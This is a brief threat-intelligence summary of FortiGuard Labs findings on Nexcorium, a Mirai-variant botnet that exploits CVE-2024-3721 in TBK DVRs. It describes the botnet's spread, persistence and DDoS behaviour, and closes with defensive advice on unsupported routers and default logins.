Overview
- Fortinet’s FortiGuard Labs reports active infections that use CVE-2024-3721 in TBK DVR-4104 and DVR-4216 units to install a Mirai-family strain dubbed Nexcorium.
- The intrusion drops a downloader that fetches processor-specific Linux payloads and shows a takeover message reading “nexuscorp has taken control,” with requests tagged by an “X-Hacked-By: Nexus Team” header.
- Once on a device, the malware tries Telnet logins with a large hard-coded username and password list and runs an embedded Huawei HG532 exploit (CVE-2017-17215) to spread inside local networks.
- The bot persists by adding cron jobs, a systemd service, rc.local entries, and inittab changes, then deletes the original file as it readies the device to take DDoS commands over UDP, TCP, and SMTP.
- Palo Alto Networks Unit 42 also saw automated scans for CVE-2023-33538 on end-of-life TP-Link routers that were flawed and failed, and researchers advise replacing unsupported models and removing default logins, a risk CISA highlighted in June 2025.